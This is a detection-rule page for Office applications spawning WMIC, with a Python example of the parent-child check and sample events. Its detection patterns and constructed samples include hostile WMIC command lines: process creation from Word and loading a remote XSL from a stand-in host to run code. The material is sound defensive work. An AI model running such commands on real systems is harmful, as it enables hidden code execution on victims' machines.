
Summary
This rule identifies suspicious executions of WMIC (Windows Management Instrumentation Command-line) initiated by common Office applications such as Word, Excel and PowerPoint. Attackers frequently launch WMIC from a legitimate Office process, for example from a malicious macro, so that the activity blends in with trusted software and evades detection. The rule detects an Office application spawning WMIC as a child process, which can indicate an attempt to execute malicious commands or code, often as part of a broader chain involving process creation or code injection. By examining the parent-child relationship of processes, it focuses on the case where Office software is the parent of WMIC, a well-known tactic used by threat actors to hide behind trusted applications. The detection logic is strict: both the parent process and the WMIC invocation must match criteria covering the execution context and the command-line arguments before an alert fires, which keeps benign WMIC use from generating noise. The rule therefore supports proactive detection of malicious activity masquerading behind trusted applications.
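The following is an added example, not the rule's own query, that shows the parent-child check described above applied to a handful of constructed process-creation events. The set of Office parent images and the suspicious command-line patterns (`process call create`, `/format:`, `/node:`, `win32_process`) are assumptions chosen for illustration; the actual rule's criteria may differ.

```python
"""Added example: flag wmic.exe launched by an Office application.

The event shape, the Office parent list and the command-line patterns are
assumptions for this illustration, not the page's rule definition.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Assumption: Office executables commonly abused as launchers.
OFFICE_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "msaccess.exe", "mspub.exe", "visio.exe", "onenote.exe",
}

# Assumption: WMIC arguments that indicate code execution or remote XSL
# loading rather than routine inventory queries.
SUSPICIOUS_CMDLINE: List[Tuple[str, re.Pattern]] = [
    ("process_call_create", re.compile(r"process\s+call\s+create", re.I)),
    ("xsl_format", re.compile(r"/format:", re.I)),
    ("remote_node", re.compile(r"/node:", re.I)),
    ("win32_process", re.compile(r"win32_process", re.I)),
]


@dataclass
class ProcessEvent:
    pid: int
    image: str          # full path of the new process
    cmdline: str        # full command line of the new process
    parent_image: str   # full path of the parent process


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_office_parent(ev: ProcessEvent) -> bool:
    return basename(ev.parent_image) in OFFICE_PARENTS


def is_wmic(ev: ProcessEvent) -> bool:
    return basename(ev.image) == "wmic.exe"


def matched_pattern(cmdline: str) -> Optional[str]:
    """Label of the first suspicious pattern found, or None."""
    for label, pattern in SUSPICIOUS_CMDLINE:
        if pattern.search(cmdline):
            return label
    return None


def evaluate(ev: ProcessEvent) -> Optional[str]:
    """Return a reason label if the event matches, else None.

    Both conditions must hold: an Office parent spawning wmic.exe, AND a
    command line that matches one of the suspicious patterns. An Office app
    running a benign WMIC query does not fire.
    """
    if not (is_office_parent(ev) and is_wmic(ev)):
        return None
    return matched_pattern(ev.cmdline)


def scan(events: List[ProcessEvent]) -> List[Tuple[int, str, str]]:
    """(pid, parent name, reason) for every matching event."""
    hits = []
    for ev in events:
        reason = evaluate(ev)
        if reason:
            hits.append((ev.pid, basename(ev.parent_image), reason))
    return hits


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    ProcessEvent(101, r"C:\Windows\System32\wbem\WMIC.exe",
                 'wmic process call create "cmd.exe /c whoami"',
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
    ProcessEvent(102, r"C:\Windows\System32\wbem\wmic.exe",
                 'wmic os get /format:"http://example.invalid/t.xsl"',
                 r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"),
    # Same WMIC abuse, but parent is not an Office app: out of scope here.
    ProcessEvent(103, r"C:\Windows\System32\wbem\wmic.exe",
                 "wmic process call create notepad.exe",
                 r"C:\Windows\explorer.exe"),
    # Office parent, but the child is not WMIC.
    ProcessEvent(104, r"C:\Windows\splwow64.exe", "splwow64.exe 12288",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
    # Office parent spawning WMIC with a benign query: no hit.
    ProcessEvent(105, r"C:\Windows\System32\wbem\wmic.exe",
                 "wmic os get caption",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

Event 105 is the reason the page calls the logic strict: an Office parent and a WMIC child alone are not enough, the command line must also look like execution or remote code loading. When tuning, widen `SUSPICIOUS_CMDLINE` before widening `OFFICE_PARENTS`, since the former governs precision and the latter only coverage.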
Categories
- Windows
Data Sources
- Process
Created: 2021-08-23